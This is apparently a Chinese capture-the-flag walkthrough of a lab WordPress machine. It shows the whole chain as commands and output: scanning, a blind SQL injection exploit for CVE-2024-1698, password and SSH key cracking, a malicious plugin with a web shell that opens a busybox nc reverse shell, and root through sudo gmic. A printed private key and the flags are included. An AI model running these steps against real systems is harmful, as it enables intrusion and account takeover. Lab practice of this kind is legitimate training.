信息收集 服务探测 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 ❯ sudo arp-scan -l [sudo ] password for Pepster: Sorry, try again. [sudo ] password for Pepster: Interface: eth0, type : EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 (Unknown) 192.168.60.2 00:50:56:e3:f6:57 (Unknown) 192.168.60.153 08:00:27:29:ca:5d (Unknown) 192.168.60.254 00:50:56:e0:e6:12 (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.965 seconds (130.28 hosts/sec). 4 responded ❯ export ip=192.168.60.153 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-' `-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Port scanning: Because every port has a story to tell. [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan' s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000' .Open 192.168.60.153:22 Open 192.168.60.153:80 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 18:56 CST Initiating ARP Ping Scan at 18:56 Scanning 192.168.60.153 [1 port] Completed ARP Ping Scan at 18:56, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:56 Completed Parallel DNS resolution of 1 host. at 18:56, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 18:56 Scanning 192.168.60.153 [2 ports] Discovered open port 22/tcp on 192.168.60.153 Discovered open port 80/tcp on 192.168.60.153 Completed SYN Stealth Scan at 18:56, 0.04s elapsed (2 total ports) Nmap scan report for 192.168.60.153 Host is up, received arp-response (0.00054s latency). Scanned at 2025-01-16 18:56:53 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:29:CA:5D (Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done : 1 IP address (1 host up) scanned in 0.30 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
发现绑定域名了,改一下hosts
1 2 ❯ sudo vim /etc/hosts 192.168.60.153 debugsec.thl
访问一下,发现是Wordpress的站点
使用wpscan扫一下,发现插件notificationx有SQL注入的漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 ❯ wpscan --url http://debugsec.thl -e u,ap --api-token "换成自己的" _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]y [i] Updating the Database ... [i] Update completed. [+] URL: http://debugsec.thl/ [192.168.60.153] [+] Started: Thu Jan 16 19:03:06 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.59 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://debugsec.thl/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://debugsec.thl/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.3.4 identified (Insecure, released on 2024-04-09). | Found By: Rss Generator (Passive Detection) | - http://debugsec.thl/feed/, <generator>https://wordpress.org/?v=6.3.4</generator> | - http://debugsec.thl/comments/feed/, <generator>https://wordpress.org/?v=6.3.4</generator> | | [!] 3 vulnerabilities identified: | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API | Fixed in: 6.3.5 | References: | - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28 | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block | Fixed in: 6.3.5 | References: | - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block | Fixed in: 6.3.5 | References: | - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ [+] WordPress theme in use: twentytwentyone | Location: http://debugsec.thl/wp-content/themes/twentytwentyone/ | Last Updated: 2024-11-13T00:00:00.000Z | Readme: http://debugsec.thl/wp-content/themes/twentytwentyone/readme.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://debugsec.thl/wp-content/themes/twentytwentyone/style.css?ver=1.9 | Style Name: Twenty Twenty-One | Style URI: https://wordpress.org/themes/twentytwentyone/ | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Css Style In 404 Page (Passive Detection) | | Version: 1.9 (80% confidence) | Found By: Style (Passive Detection) | - http://debugsec.thl/wp-content/themes/twentytwentyone/style.css?ver=1.9, Match: ' Version: 1.9' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] notificationx | Location: http://debugsec.thl/wp-content/plugins/notificationx/ | Last Updated: 2024-12-22T11:00:00.000Z | [!] The version is out of date, the latest version is 2.9.5 | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | [!] 2 vulnerabilities identified: | | [!] Title: NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor < 2.8.3 - Unauthenticated SQL Injection | Fixed in: 2.8.3 | References: | - https://wpscan.com/vulnerability/3a66cb18-dfba-4b6b-bde0-d0efe2853326 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1698 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91 | | [!] Title: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar < 2.9.4 - Authenticated (Admin+) Stored Cross-Site Scripting | Fixed in: 2.9.4 | References: | - https://wpscan.com/vulnerability/58622c29-d1cc-43a6-90a9-79aadd3560dd | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11727 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/338edb1d-101a-4b6e-ac25-b59bd3e17f8b | | Version: 2.8.2 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://debugsec.thl/wp-content/plugins/notificationx/README.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://debugsec.thl/wp-content/plugins/notificationx/README.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:02 <========================================================================> (10 / 10) 100.00% Time: 00:00:02 [i] User(s) Identified: [+] wordpress | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://debugsec.thl/wp-json/wp/v2/users/?per_page=100&page=1 | Oembed API - Author URL (Aggressive Detection) | - http://debugsec.thl/wp-json/oembed/1.0/embed?url=http://debugsec.thl/&format=json | Rss Generator (Aggressive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 22 [+] Finished: Thu Jan 16 19:03:23 2025 [+] Requests Done: 69 [+] Cached Requests: 8 [+] Data Sent: 16.727 KB [+] Data Received: 13.747 MB [+] Memory used: 274.375 MB [+] Elapsed time: 00:00:17
插件SQL注入漏洞 找了一会Poc利用,终于有个可以用了
利用未被利用的 - NotificationX WordPress 插件中未经身份验证的盲 SQLi - CVE-2024-1698 - 新人的新漏洞 - vsociety
利用一下,拿到密码hash,爆破一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ❯ python3 exploit.py --url http://debugsec.thl --sleep-time 0.2 --debug [+] The WordPress instance seems to be vulnerable to CVE-2024-1698. [DEBUG] $ [DEBUG] $P [DEBUG] $P$ [DEBUG] $P$B [DEBUG] $P$Be [DEBUG] $P$Beo [DEBUG] $P$BeoV [DEBUG] $P$BeoVY [DEBUG] $P$BeoVY5 [DEBUG] $P$BeoVY5F [DEBUG] $P$BeoVY5FZ [DEBUG] $P$BeoVY5FZY [DEBUG] $P$BeoVY5FZYW [DEBUG] $P$BeoVY5FZYWg [DEBUG] $P$BeoVY5FZYWg4 [DEBUG] $P$BeoVY5FZYWg4j [DEBUG] $P$BeoVY5FZYWg4j9 [DEBUG] $P$BeoVY5FZYWg4j90 [DEBUG] $P$BeoVY5FZYWg4j90B [DEBUG] $P$BeoVY5FZYWg4j90BE [DEBUG] $P$BeoVY5FZYWg4j90BEh [DEBUG] $P$BeoVY5FZYWg4j90BEh5 [DEBUG] $P$BeoVY5FZYWg4j90BEh5C [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cm [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9 [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3 [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Z [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Za [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Zam [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Zamq [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Zamqx [DEBUG] $P$BeoVY5FZYWg4j90BEh5Cme9j3Zamqx / [*] WordPress admin password hash : $P$BeoVY5FZYWg4j90BEh5Cme9j3Zamqx / ❯ vim hash ❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status mcartney (?) 1g 0:00:00:04 DONE (2025-01-16 19:54) 0.2004g/s 60177p/s 60177c/s 60177C/s megs21..massachusetts Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed.
拿到密码mcartney
尝试利用账户名wordpress登入一下
成功进入管理页面
既然获取登入权限后怎么拿到shell呢,就两种方法一个是修改主题代码,还一个是上传恶意的插件
不过我尝试了修改主题文件不成功会提示
尚无法与网站通信以检查致命错误,因此PHP更改已被撤销。 您将需要通过其他方式上传更改到您的PHP文件,例如使用SFTP。
用户提权 恶意插件上传 那直接上传插件得了
wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.
利用msf创建一个含有恶意页面的插件,上传完激活插件
访问/wp-content/plugins/malicious/SWebTheme.php?cmd=busybox nc 192.168.60.100 4444 -e sh利用busybox反弹shell即可
1 2 3 4 5 6 7 8 9 10 ❯ pwncat-cs -lp 4444 [20:17:24] Welcome to pwncat 🐈! __main__.py:164 [20:21:09] received connection from 192.168.60.153:36854 bind.py:84 [20:21:09] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957 [20:21:10] 192.168.60.153:36854: registered new host w/ db manager.py:957 (local ) pwncat$ (remote) www-data@debugsec:/var/www/html/wp-content/plugins/malicious$ (remote) www-data@debugsec:/var/www$ cat /etc/passwd|grep bin/bash root:x:0:0:root:/root:/bin/bash debugsec:x:1001:1001::/home/debugsec:/bin/bash
拿到一个用户debugsec,我们可以在opt目录下发现藏着的私钥文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 (remote) www-data@debugsec:/home$ cd /opt (remote) www-data@debugsec:/opt$ ls id_rsa (remote) www-data@debugsec:/opt$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 VH7MVBPt98Pi44moXDo+DXp3w= -----END OPENSSH PRIVATE KEY-----
爆破一下,ssh连接上去
拿到user了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ❯ vim id_rsa ❯ ssh2john id_rsa >hash ❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status pangga (id_rsa) 1g 0:00:01:11 DONE (2025-01-16 20:28) 0.01389g/s 41.78p/s 41.78c/s 41.78C/s lance..colton Use the "--show" option to display all of the cracked passwords reliably Session completed. ❯ ssh [email protected] -i id_rsa Enter passphrase for key 'id_rsa' : Linux debugsec 6.1.0-21-amd64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jun 28 18:57:57 2024 from 192.168.18.19 debugsec@debugsec:~$ cat user.txt 412a9160d3def2cb6da1d9fc7114187b -
Root提权 Sudo提权 用户有sudo权限执行gmic
1 2 3 4 5 6 7 debugsec@debugsec:~$ sudo -l Matching Defaults entries for debugsec on debugsec: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User debugsec may run the following commands on debugsec: (root) NOPASSWD: /usr/bin/gmic
查了一下gmic是什么,就是一个开源的图像处理工具
我们要让他能执行命令才行
看了下官方的帮助手册,直接x即可
G’MIC - GREYC 的图像计算魔力:用于图像处理的全功能开源框架 - 命令列表
1 2 3 4 5 6 7 8 9 10 debugsec@debugsec:~$ sudo /usr/bin/gmic x /bin/bash [gmic]-0./ Start G'MIC interpreter. [gmic]-0./ Execute external command ' /bin/bash' in verbose mode. root@debugsec:/home/debugsec# id uid=0(root) gid=0(root) grupos=0(root) root@debugsec:/home/debugsec# cd ~ root@debugsec:~# ls gmic root.txt root@debugsec:~# cat root.txt 9932a7bd6d68269fffb0884e6a400168
